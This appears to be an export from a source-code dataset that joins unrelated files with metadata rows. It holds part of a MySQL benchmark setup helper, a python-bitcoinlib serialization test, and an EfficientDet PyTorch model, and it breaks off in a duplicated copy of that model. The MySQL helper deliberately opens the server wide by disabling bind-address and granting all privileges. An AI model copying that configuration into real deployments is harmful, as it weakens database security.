'" | sudo tee -a %s' % self.server_vm.GetPathToConfig(mysql_name))
if self.mysql_bin_log:
self.server_vm.RemoteCommand('echo "\n'
'server-id = 1\n'
'log_bin = /var/log/mysql/mysql-bin.log\n'
'" | sudo tee -a %s' %
self.server_vm.GetPathToConfig(mysql_name))
# These (and max_connections after restarting) help avoid losing connection.
self.server_vm.RemoteCommand(
'echo "\nskip-name-resolve\n'
'connect_timeout = 86400\n'
'wait_timeout = 86400\n'
'interactive_timeout = 86400" | sudo tee -a %s' %
self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand('sudo sed -i "s/bind-address/#bind-address/g" '
'%s' %
self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo sed -i '
'"s/max_allowed_packet\t= 16M/max_allowed_packet\t= 1024M/g" %s' %
self.server_vm.GetPathToConfig(mysql_name))
# Configure logging (/var/log/mysql/error.log will print upon db deletion).
self.server_vm.RemoteCommand(
'echo "\nlog_error_verbosity = 3" | sudo tee -a %s' %
self.server_vm.GetPathToConfig(mysql_name))
self.server_vm.RemoteCommand(
'sudo cat /etc/mysql/mysql.conf.d/mysql.sock',
should_log=True,
ignore_failure=True)
# Restart.
self.server_vm.RemoteCommand('sudo service %s restart' %
self.server_vm.GetServiceName(mysql_name))
self.server_vm.RemoteCommand(
'sudo cat %s' % self.server_vm.GetPathToConfig(mysql_name),
should_log=True)
self.server_vm.RemoteCommand(
self.MakeMysqlCommand(
'SET GLOBAL max_connections=8000;', use_localhost=True))
if FLAGS.ip_addresses == vm_util.IpAddressSubset.INTERNAL:
client_ip = self.client_vm.internal_ip
else:
client_ip = self.client_vm.ip_address
self.server_vm.RemoteCommand(
self.MakeMysqlCommand(
'CREATE USER \'%s\'@\'%s\' IDENTIFIED BY \'%s\';' %
(self.spec.database_username, client_ip,
self.spec.database_password),
use_localhost=True))
self.server_vm.RemoteCommand(
self.MakeMysqlCommand(
'GRANT ALL PRIVILEGES ON *.* TO \'%s\'@\'%s\';' %
(self.spec.database_username, client_ip),
use_localhost=True))
self.server_vm.RemoteCommand(
self.MakeMysqlCommand('FLUSH PRIVILEGES;', use_localhost=True))
def _ApplyDbFlags(self):
if FLAGS.db_flags:
if self.is_managed_db:
self._ApplyManagedDbFlags()
else:
if self.spec.engine == MYSQL:
self._ApplyMySqlFlags()
else:
raise NotImplementedError('Flags is not supported on %s' %
self.spec.engine)
def _ApplyManagedDbFlags(self):
raise NotImplementedError('Managed Db flags is not supported for %s' %
type(self).__name__)
def _ApplyMySqlFlags(self):
if FLAGS.db_flags:
for flag in FLAGS.db_flags:
cmd = self.MakeMysqlCommand('SET %s;' % flag)
_, stderr, _ = vm_util.IssueCommand(cmd, raise_on_failure=False)
if stderr:
raise Exception('Invalid MySQL flags: %s' % stderr)
def PrintUnmanagedDbStats(self):
if self.spec.engine == 'mysql':
self.server_vm.RemoteCommand('sudo cat /var/log/mysql/error.log')
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_connects\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
self.server_vm.RemoteCommand(
'mysql %s -e "SHOW GLOBAL STATUS LIKE \'Aborted_clients\';"' %
self.MakeMysqlConnectionString(use_localhost=True))
def Failover(self):
if not self.spec.high_availability:
raise Exception('Attempt to fail over a database that isn\'t marked '
'as high available')
self._FailoverHA()
@abstractmethod
def _FailoverHA(self):
pass
| true | true |
f7fa1fedc19429389b6a3bc8e1bb2c09924aaec3 | 2,230 | py | Python | glue/bitcoinlib/tests/test_net.py | LykkeCity/Notary | 416c2c11c73e9caaf23a7c3a8eaae30a090823d4 | [
"MIT"
] | null | null | null | glue/bitcoinlib/tests/test_net.py | LykkeCity/Notary | 416c2c11c73e9caaf23a7c3a8eaae30a090823d4 | [
"MIT"
] | null | null | null | glue/bitcoinlib/tests/test_net.py | LykkeCity/Notary | 416c2c11c73e9caaf23a7c3a8eaae30a090823d4 | [
"MIT"
] | 4 | 2015-12-15T20:16:05.000Z | 2020-09-08T07:29:51.000Z | # Copyright (C) 2013-2014 The python-bitcoinlib developers
#
# This file is part of python-bitcoinlib.
#
# It is subject to the license terms in the LICENSE file found in the top-level
# directory of this distribution.
#
# No part of python-bitcoinlib, including this file, may be copied, modified,
# propagated, or distributed except according to the terms contained in the
# LICENSE file.
import unittest
from bitcoinlib.net import CAddress
class Test_CAddress(unittest.TestCase):
def test_serializationSimple(self):
c = CAddress()
cSerialized = c.serialize()
cDeserialized = CAddress.deserialize(cSerialized)
cSerializedTwice = cDeserialized.serialize()
self.assertEqual(cSerialized, cSerializedTwice)
def test_serializationIPv4(self):
c = CAddress()
c.ip = "1.1.1.1"
c.port = 8333
c.nTime = 1420576401
cSerialized = c.serialize()
cDeserialized = CAddress.deserialize(cSerialized)
self.assertEqual(c, cDeserialized)
cSerializedTwice = cDeserialized.serialize()
self.assertEqual(cSerialized, cSerializedTwice)
def test_serializationIPv6(self):
c = CAddress()
c.ip = "1234:ABCD:1234:ABCD:1234:00:ABCD:1234"
c.port = 8333
c.nTime = 1420576401
cSerialized = c.serialize()
cDeserialized = CAddress.deserialize(cSerialized)
self.assertEqual(c, cDeserialized)
cSerializedTwice = cDeserialized.serialize()
self.assertEqual(cSerialized, cSerializedTwice)
def test_serializationDiff(self):
# Sanity check that the serialization code preserves differences
c1 = CAddress()
c1.ip = "1.1.1.1"
c1.port = 8333
c1.nTime = 1420576401
c2 = CAddress()
c2.ip = "1.1.1.2"
c2.port = 8333
c2.nTime = 1420576401
self.assertNotEqual(c1, c2)
c1Serialized = c1.serialize()
c2Serialized = c2.serialize()
self.assertNotEqual(c1Serialized, c2Serialized)
c1Deserialized = CAddress.deserialize(c1Serialized)
c2Deserialized = CAddress.deserialize(c2Serialized)
self.assertNotEqual(c1Deserialized, c2Deserialized)
| 28.961039 | 79 | 0.670852 |
import unittest
from bitcoinlib.net import CAddress
class Test_CAddress(unittest.TestCase):
def test_serializationSimple(self):
c = CAddress()
cSerialized = c.serialize()
cDeserialized = CAddress.deserialize(cSerialized)
cSerializedTwice = cDeserialized.serialize()
self.assertEqual(cSerialized, cSerializedTwice)
def test_serializationIPv4(self):
c = CAddress()
c.ip = "1.1.1.1"
c.port = 8333
c.nTime = 1420576401
cSerialized = c.serialize()
cDeserialized = CAddress.deserialize(cSerialized)
self.assertEqual(c, cDeserialized)
cSerializedTwice = cDeserialized.serialize()
self.assertEqual(cSerialized, cSerializedTwice)
def test_serializationIPv6(self):
c = CAddress()
c.ip = "1234:ABCD:1234:ABCD:1234:00:ABCD:1234"
c.port = 8333
c.nTime = 1420576401
cSerialized = c.serialize()
cDeserialized = CAddress.deserialize(cSerialized)
self.assertEqual(c, cDeserialized)
cSerializedTwice = cDeserialized.serialize()
self.assertEqual(cSerialized, cSerializedTwice)
def test_serializationDiff(self):
c1 = CAddress()
c1.ip = "1.1.1.1"
c1.port = 8333
c1.nTime = 1420576401
c2 = CAddress()
c2.ip = "1.1.1.2"
c2.port = 8333
c2.nTime = 1420576401
self.assertNotEqual(c1, c2)
c1Serialized = c1.serialize()
c2Serialized = c2.serialize()
self.assertNotEqual(c1Serialized, c2Serialized)
c1Deserialized = CAddress.deserialize(c1Serialized)
c2Deserialized = CAddress.deserialize(c2Serialized)
self.assertNotEqual(c1Deserialized, c2Deserialized)
| true | true |
f7fa20167068a39de4cb6d6e77b77da288bcf085 | 23,706 | py | Python | nets/efficientdet.py | Quentin-kt/efficientdet-pytorch | 6a013481f9264a065ff1e3c5affe3102ef6066ce | [
"MIT"
] | null | null | null | nets/efficientdet.py | Quentin-kt/efficientdet-pytorch | 6a013481f9264a065ff1e3c5affe3102ef6066ce | [
"MIT"
] | null | null | null | nets/efficientdet.py | Quentin-kt/efficientdet-pytorch | 6a013481f9264a065ff1e3c5affe3102ef6066ce | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from utils.anchors import Anchors
from nets.efficientnet import EfficientNet as EffNet
from nets.layers import (Conv2dStaticSamePadding, MaxPool2dStaticSamePadding,
MemoryEfficientSwish, Swish)
#----------------------------------#
# Xception中深度可分离卷积
# 先3x3的深度可分离卷积
# 再1x1的普通卷积
#----------------------------------#
class SeparableConvBlock(nn.Module):
def __init__(self, in_channels, out_channels=None, norm=True, activation=False, onnx_export=False):
super(SeparableConvBlock, self).__init__()
if out_channels is None:
out_channels = in_channels
self.depthwise_conv = Conv2dStaticSamePadding(in_channels, in_channels,
kernel_size=3, stride=1, groups=in_channels, bias=False)
self.pointwise_conv = Conv2dStaticSamePadding(in_channels, out_channels, kernel_size=1, stride=1)
self.norm = norm
if self.norm:
self.bn = nn.BatchNorm2d(num_features=out_channels, momentum=0.01, eps=1e-3)
self.activation = activation
if self.activation:
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
def forward(self, x):
x = self.depthwise_conv(x)
x = self.pointwise_conv(x)
if self.norm:
x = self.bn(x)
if self.activation:
x = self.swish(x)
return x
class BiFPN(nn.Module):
def __init__(self, num_channels, conv_channels, first_time=False, epsilon=1e-4, onnx_export=False, attention=True):
super(BiFPN, self).__init__()
self.epsilon = epsilon
self.conv6_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv5_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv4_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv3_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv4_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv5_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv6_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv7_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.p6_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p5_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p4_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p3_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p4_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p5_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p6_downsample = MaxPool2dStaticSamePadding(3, 2)
self.p7_downsample = MaxPool2dStaticSamePadding(3, 2)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
self.first_time = first_time
if self.first_time:
# 获取到了efficientnet的最后三层,对其进行通道的下压缩
self.p5_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p4_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p3_down_channel = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[0], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
# 对输入进来的p5进行宽高的下采样
self.p5_to_p6 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
MaxPool2dStaticSamePadding(3, 2)
)
self.p6_to_p7 = nn.Sequential(
MaxPool2dStaticSamePadding(3, 2)
)
# BIFPN第一轮的时候,跳线那里并不是同一个in
self.p4_down_channel_2 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[1], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
self.p5_down_channel_2 = nn.Sequential(
Conv2dStaticSamePadding(conv_channels[2], num_channels, 1),
nn.BatchNorm2d(num_channels, momentum=0.01, eps=1e-3),
)
# 简易注意力机制的weights
self.p6_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p6_w1_relu = nn.ReLU()
self.p5_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p5_w1_relu = nn.ReLU()
self.p4_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p4_w1_relu = nn.ReLU()
self.p3_w1 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p3_w1_relu = nn.ReLU()
self.p4_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p4_w2_relu = nn.ReLU()
self.p5_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p5_w2_relu = nn.ReLU()
self.p6_w2 = nn.Parameter(torch.ones(3, dtype=torch.float32), requires_grad=True)
self.p6_w2_relu = nn.ReLU()
self.p7_w2 = nn.Parameter(torch.ones(2, dtype=torch.float32), requires_grad=True)
self.p7_w2_relu = nn.ReLU()
self.attention = attention
def forward(self, inputs):
""" bifpn模块结构示意图
P7_0 -------------------------> P7_2 -------->
|-------------| ↑
↓ |
P6_0 ---------> P6_1 ---------> P6_2 -------->
|-------------|--------------↑ ↑
↓ |
P5_0 ---------> P5_1 ---------> P5_2 -------->
|-------------|--------------↑ ↑
↓ |
P4_0 ---------> P4_1 ---------> P4_2 -------->
|-------------|--------------↑ ↑
|--------------↓ |
P3_0 -------------------------> P3_2 -------->
"""
if self.attention:
p3_out, p4_out, p5_out, p6_out, p7_out = self._forward_fast_attention(inputs)
else:
p3_out, p4_out, p5_out, p6_out, p7_out = self._forward(inputs)
return p3_out, p4_out, p5_out, p6_out, p7_out
def _forward_fast_attention(self, inputs):
#------------------------------------------------#
# 当phi=1、2、3、4、5的时候使用fast_attention
# 获得三个shape的有效特征层
# 分别是C3 64, 64, 40
# C4 32, 32, 112
# C5 16, 16, 320
#------------------------------------------------#
if self.first_time:
#------------------------------------------------------------------------#
# 第一次BIFPN需要 下采样 与 调整通道 获得 p3_in p4_in p5_in p6_in p7_in
#------------------------------------------------------------------------#
p3, p4, p5 = inputs
#-------------------------------------------#
# 首先对通道数进行调整
# C3 64, 64, 40 -> 64, 64, 64
#-------------------------------------------#
p3_in = self.p3_down_channel(p3)
#-------------------------------------------#
# 首先对通道数进行调整
# C4 32, 32, 112 -> 32, 32, 64
# -> 32, 32, 64
#-------------------------------------------#
p4_in_1 = self.p4_down_channel(p4)
p4_in_2 = self.p4_down_channel_2(p4)
#-------------------------------------------#
# 首先对通道数进行调整
# C5 16, 16, 320 -> 16, 16, 64
# -> 16, 16, 64
#-------------------------------------------#
p5_in_1 = self.p5_down_channel(p5)
p5_in_2 = self.p5_down_channel_2(p5)
#-------------------------------------------#
# 对C5进行下采样,调整通道数与宽高
# C5 16, 16, 320 -> 8, 8, 64
#-------------------------------------------#
p6_in = self.p5_to_p6(p5)
#-------------------------------------------#
# 对P6_in进行下采样,调整宽高
# P6_in 8, 8, 64 -> 4, 4, 64
#-------------------------------------------#
p7_in = self.p6_to_p7(p6_in)
# 简单的注意力机制,用于确定更关注p7_in还是p6_in
p6_w1 = self.p6_w1_relu(self.p6_w1)
weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
# 简单的注意力机制,用于确定更关注p6_up还是p5_in
p5_w1 = self.p5_w1_relu(self.p5_w1)
weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
p5_td= self.conv5_up(self.swish(weight[0] * p5_in_1 + weight[1] * self.p5_upsample(p6_td)))
# 简单的注意力机制,用于确定更关注p5_up还是p4_in
p4_w1 = self.p4_w1_relu(self.p4_w1)
weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
p4_td= self.conv4_up(self.swish(weight[0] * p4_in_1 + weight[1] * self.p4_upsample(p5_td)))
# 简单的注意力机制,用于确定更关注p4_up还是p3_in
p3_w1 = self.p3_w1_relu(self.p3_w1)
weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
# 简单的注意力机制,用于确定更关注p4_in_2还是p4_up还是p3_out
p4_w2 = self.p4_w2_relu(self.p4_w2)
weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
p4_out = self.conv4_down(
self.swish(weight[0] * p4_in_2 + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
# 简单的注意力机制,用于确定更关注p5_in_2还是p5_up还是p4_out
p5_w2 = self.p5_w2_relu(self.p5_w2)
weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
p5_out = self.conv5_down(
self.swish(weight[0] * p5_in_2 + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
# 简单的注意力机制,用于确定更关注p6_in还是p6_up还是p5_out
p6_w2 = self.p6_w2_relu(self.p6_w2)
weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
p6_out = self.conv6_down(
self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
# 简单的注意力机制,用于确定更关注p7_in还是p7_up还是p6_out
p7_w2 = self.p7_w2_relu(self.p7_w2)
weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
else:
p3_in, p4_in, p5_in, p6_in, p7_in = inputs
# 简单的注意力机制,用于确定更关注p7_in还是p6_in
p6_w1 = self.p6_w1_relu(self.p6_w1)
weight = p6_w1 / (torch.sum(p6_w1, dim=0) + self.epsilon)
p6_td= self.conv6_up(self.swish(weight[0] * p6_in + weight[1] * self.p6_upsample(p7_in)))
# 简单的注意力机制,用于确定更关注p6_up还是p5_in
p5_w1 = self.p5_w1_relu(self.p5_w1)
weight = p5_w1 / (torch.sum(p5_w1, dim=0) + self.epsilon)
p5_td= self.conv5_up(self.swish(weight[0] * p5_in + weight[1] * self.p5_upsample(p6_td)))
# 简单的注意力机制,用于确定更关注p5_up还是p4_in
p4_w1 = self.p4_w1_relu(self.p4_w1)
weight = p4_w1 / (torch.sum(p4_w1, dim=0) + self.epsilon)
p4_td= self.conv4_up(self.swish(weight[0] * p4_in + weight[1] * self.p4_upsample(p5_td)))
# 简单的注意力机制,用于确定更关注p4_up还是p3_in
p3_w1 = self.p3_w1_relu(self.p3_w1)
weight = p3_w1 / (torch.sum(p3_w1, dim=0) + self.epsilon)
p3_out = self.conv3_up(self.swish(weight[0] * p3_in + weight[1] * self.p3_upsample(p4_td)))
# 简单的注意力机制,用于确定更关注p4_in还是p4_up还是p3_out
p4_w2 = self.p4_w2_relu(self.p4_w2)
weight = p4_w2 / (torch.sum(p4_w2, dim=0) + self.epsilon)
p4_out = self.conv4_down(
self.swish(weight[0] * p4_in + weight[1] * p4_td+ weight[2] * self.p4_downsample(p3_out)))
# 简单的注意力机制,用于确定更关注p5_in还是p5_up还是p4_out
p5_w2 = self.p5_w2_relu(self.p5_w2)
weight = p5_w2 / (torch.sum(p5_w2, dim=0) + self.epsilon)
p5_out = self.conv5_down(
self.swish(weight[0] * p5_in + weight[1] * p5_td+ weight[2] * self.p5_downsample(p4_out)))
# 简单的注意力机制,用于确定更关注p6_in还是p6_up还是p5_out
p6_w2 = self.p6_w2_relu(self.p6_w2)
weight = p6_w2 / (torch.sum(p6_w2, dim=0) + self.epsilon)
p6_out = self.conv6_down(
self.swish(weight[0] * p6_in + weight[1] * p6_td+ weight[2] * self.p6_downsample(p5_out)))
# 简单的注意力机制,用于确定更关注p7_in还是p7_up还是p6_out
p7_w2 = self.p7_w2_relu(self.p7_w2)
weight = p7_w2 / (torch.sum(p7_w2, dim=0) + self.epsilon)
p7_out = self.conv7_down(self.swish(weight[0] * p7_in + weight[1] * self.p7_downsample(p6_out)))
return p3_out, p4_out, p5_out, p6_out, p7_out
def _forward(self, inputs):
# 当phi=6、7的时候使用_forward
if self.first_time:
# 第一次BIFPN需要下采样与降通道获得
# p3_in p4_in p5_in p6_in p7_in
p3, p4, p5 = inputs
p3_in = self.p3_down_channel(p3)
p4_in_1 = self.p4_down_channel(p4)
p4_in_2 = self.p4_down_channel_2(p4)
p5_in_1 = self.p5_down_channel(p5)
p5_in_2 = self.p5_down_channel_2(p5)
p6_in = self.p5_to_p6(p5)
p7_in = self.p6_to_p7(p6_in)
p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
p5_td= self.conv5_up(self.swish(p5_in_1 + self.p5_upsample(p6_td)))
p4_td= self.conv4_up(self.swish(p4_in_1 + self.p4_upsample(p5_td)))
p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
p4_out = self.conv4_down(
self.swish(p4_in_2 + p4_td+ self.p4_downsample(p3_out)))
p5_out = self.conv5_down(
self.swish(p5_in_2 + p5_td+ self.p5_downsample(p4_out)))
p6_out = self.conv6_down(
self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
else:
p3_in, p4_in, p5_in, p6_in, p7_in = inputs
p6_td= self.conv6_up(self.swish(p6_in + self.p6_upsample(p7_in)))
p5_td= self.conv5_up(self.swish(p5_in + self.p5_upsample(p6_td)))
p4_td= self.conv4_up(self.swish(p4_in + self.p4_upsample(p5_td)))
p3_out = self.conv3_up(self.swish(p3_in + self.p3_upsample(p4_td)))
p4_out = self.conv4_down(
self.swish(p4_in + p4_td+ self.p4_downsample(p3_out)))
p5_out = self.conv5_down(
self.swish(p5_in + p5_td+ self.p5_downsample(p4_out)))
p6_out = self.conv6_down(
self.swish(p6_in + p6_td+ self.p6_downsample(p5_out)))
p7_out = self.conv7_down(self.swish(p7_in + self.p7_downsample(p6_out)))
return p3_out, p4_out, p5_out, p6_out, p7_out
class BoxNet(nn.Module):
def __init__(self, in_channels, num_anchors, num_layers, onnx_export=False):
super(BoxNet, self).__init__()
self.num_layers = num_layers
self.conv_list = nn.ModuleList(
[SeparableConvBlock(in_channels, in_channels, norm=False, activation=False) for i in range(num_layers)])
# 每一个有效特征层对应的Batchnor不同
self.bn_list = nn.ModuleList(
[nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3) for i in range(num_layers)]) for j in range(5)])
# 9
# 4 中心,宽高
self.header = SeparableConvBlock(in_channels, num_anchors * 4, norm=False, activation=False)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
def forward(self, inputs):
feats = []
# 对每个特征层循环
for feat, bn_list in zip(inputs, self.bn_list):
# 每个特征层需要进行num_layer次卷积+标准化+激活函数
for i, bn, conv in zip(range(self.num_layers), bn_list, self.conv_list):
feat = conv(feat)
feat = bn(feat)
feat = self.swish(feat)
feat = self.header(feat)
feat = feat.permute(0, 2, 3, 1)
feat = feat.contiguous().view(feat.shape[0], -1, 4)
feats.append(feat)
# 进行一个堆叠
feats = torch.cat(feats, dim=1)
return feats
class ClassNet(nn.Module):
def __init__(self, in_channels, num_anchors, num_classes, num_layers, onnx_export=False):
super(ClassNet, self).__init__()
self.num_anchors = num_anchors
self.num_classes = num_classes
self.num_layers = num_layers
self.conv_list = nn.ModuleList(
[SeparableConvBlock(in_channels, in_channels, norm=False, activation=False) for i in range(num_layers)])
# 每一个有效特征层对应的BatchNorm2d不同
self.bn_list = nn.ModuleList(
[nn.ModuleList([nn.BatchNorm2d(in_channels, momentum=0.01, eps=1e-3) for i in range(num_layers)]) for j in range(5)])
# num_anchors = 9
# num_anchors num_classes
self.header = SeparableConvBlock(in_channels, num_anchors * num_classes, norm=False, activation=False)
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
def forward(self, inputs):
feats = []
# 对每个特征层循环
for feat, bn_list in zip(inputs, self.bn_list):
for i, bn, conv in zip(range(self.num_layers), bn_list, self.conv_list):
# 每个特征层需要进行num_layer次卷积+标准化+激活函数
feat = conv(feat)
feat = bn(feat)
feat = self.swish(feat)
feat = self.header(feat)
feat = feat.permute(0, 2, 3, 1)
feat = feat.contiguous().view(feat.shape[0], feat.shape[1], feat.shape[2], self.num_anchors, self.num_classes)
feat = feat.contiguous().view(feat.shape[0], -1, self.num_classes)
feats.append(feat)
# 进行一个堆叠
feats = torch.cat(feats, dim=1)
# 取sigmoid表示概率
feats = feats.sigmoid()
return feats
class EfficientNet(nn.Module):
def __init__(self, phi, load_weights=False):
super(EfficientNet, self).__init__()
model = EffNet.from_pretrained(f'efficientnet-b{phi}', load_weights)
del model._conv_head
del model._bn1
del model._avg_pooling
del model._dropout
del model._fc
self.model = model
def forward(self, x):
x = self.model._conv_stem(x)
x = self.model._bn0(x)
x = self.model._swish(x)
feature_maps = []
last_x = None
for idx, block in enumerate(self.model._blocks):
drop_connect_rate = self.model._global_params.drop_connect_rate
if drop_connect_rate:
drop_connect_rate *= float(idx) / len(self.model._blocks)
x = block(x, drop_connect_rate=drop_connect_rate)
#------------------------------------------------------#
# 取出对应的特征层,如果某个EffcientBlock的步长为2的话
# 意味着它的前一个特征层为有效特征层
# 除此之外,最后一个EffcientBlock的输出为有效特征层
#------------------------------------------------------#
if block._depthwise_conv.stride == [2, 2]:
feature_maps.append(last_x)
elif idx == len(self.model._blocks) - 1:
feature_maps.append(x)
last_x = x
del last_x
return feature_maps[1:]
class EfficientDetBackbone(nn.Module):
def __init__(self, num_classes=80, phi=0, load_weights=False):
super(EfficientDetBackbone, self).__init__()
#--------------------------------#
# phi指的是efficientdet的版本
#--------------------------------#
self.phi = phi
#---------------------------------------------------#
# backbone_phi指的是该efficientdet对应的efficient
#---------------------------------------------------#
self.backbone_phi = [0, 1, 2, 3, 4, 5, 6, 6]
#--------------------------------#
# BiFPN所用的通道数
#--------------------------------#
self.fpn_num_filters = [64, 88, 112, 160, 224, 288, 384, 384]
#--------------------------------#
# BiFPN的重复次数
#--------------------------------#
self.fpn_cell_repeats = [3, 4, 5, 6, 7, 7, 8, 8]
#---------------------------------------------------#
# Effcient Head卷积重复次数
#---------------------------------------------------#
self.box_class_repeats = [3, 3, 3, 4, 4, 4, 5, 5]
#---------------------------------------------------#
# 基础的先验框大小
#---------------------------------------------------#
self.anchor_scale = [4., 4., 4., 4., 4., 4., 4., 5.]
num_anchors = 9
conv_channel_coef = {
0: [40, 112, 320],
1: [40, 112, 320],
2: [48, 120, 352],
3: [48, 136, 384],
4: [56, 160, 448],
5: [64, 176, 512],
6: [72, 200, 576],
7: [72, 200, 576],
}
#------------------------------------------------------#
# 在经过多次BiFPN模块的堆叠后,我们获得的fpn_features
# 假设我们使用的是efficientdet-D0包括五个有效特征层:
# P3_out 64,64,64
# P4_out 32,32,64
# P5_out 16,16,64
# P6_out 8,8,64
# P7_out 4,4,64
#------------------------------------------------------#
self.bifpn = nn.Sequential(
*[BiFPN(self.fpn_num_filters[self.phi],
conv_channel_coef[phi],
True if _ == 0 else False,
attention=True if phi < 6 else False)
for _ in range(self.fpn_cell_repeats[phi])])
self.num_classes = num_classes
#------------------------------------------------------#
# 创建efficient head
# 可以将特征层转换成预测结果
#------------------------------------------------------#
self.regressor = BoxNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
num_layers=self.box_class_repeats[self.phi])
self.classifier = ClassNet(in_channels=self.fpn_num_filters[self.phi], num_anchors=num_anchors,
num_classes=num_classes, num_layers=self.box_class_repeats[self.phi])
self.anchors = Anchors(anchor_scale=self.anchor_scale[phi])
#-------------------------------------------#
# 获得三个shape的有效特征层
# 分别是C3 64, 64, 40
# C4 32, 32, 112
# C5 16, 16, 320
#-------------------------------------------#
self.backbone_net = EfficientNet(self.backbone_phi[phi], load_weights)
def freeze_bn(self):
for m in self.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
def forward(self, inputs):
_, p3, p4, p5 = self.backbone_net(inputs)
features = (p3, p4, p5)
features = self.bifpn(features)
regression = self.regressor(features)
classification = self.classifier(features)
anchors = self.anchors(inputs)
return features, regression, classification, anchors
| 42.636691 | 129 | 0.531047 | import torch
import torch.nn as nn
from utils.anchors import Anchors
from nets.efficientnet import EfficientNet as EffNet
from nets.layers import (Conv2dStaticSamePadding, MaxPool2dStaticSamePadding,
MemoryEfficientSwish, Swish)
class SeparableConvBlock(nn.Module):
def __init__(self, in_channels, out_channels=None, norm=True, activation=False, onnx_export=False):
super(SeparableConvBlock, self).__init__()
if out_channels is None:
out_channels = in_channels
self.depthwise_conv = Conv2dStaticSamePadding(in_channels, in_channels,
kernel_size=3, stride=1, groups=in_channels, bias=False)
self.pointwise_conv = Conv2dStaticSamePadding(in_channels, out_channels, kernel_size=1, stride=1)
self.norm = norm
if self.norm:
self.bn = nn.BatchNorm2d(num_features=out_channels, momentum=0.01, eps=1e-3)
self.activation = activation
if self.activation:
self.swish = MemoryEfficientSwish() if not onnx_export else Swish()
def forward(self, x):
x = self.depthwise_conv(x)
x = self.pointwise_conv(x)
if self.norm:
x = self.bn(x)
if self.activation:
x = self.swish(x)
return x
class BiFPN(nn.Module):
def __init__(self, num_channels, conv_channels, first_time=False, epsilon=1e-4, onnx_export=False, attention=True):
super(BiFPN, self).__init__()
self.epsilon = epsilon
self.conv6_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv5_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv4_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv3_up = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv4_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv5_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv6_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.conv7_down = SeparableConvBlock(num_channels, onnx_export=onnx_export)
self.p6_upsample = nn.Upsample(scale_factor=2, mode='nearest')
self.p5_upsample = nn.Upsample(scale_factor=2, mode='nearest')
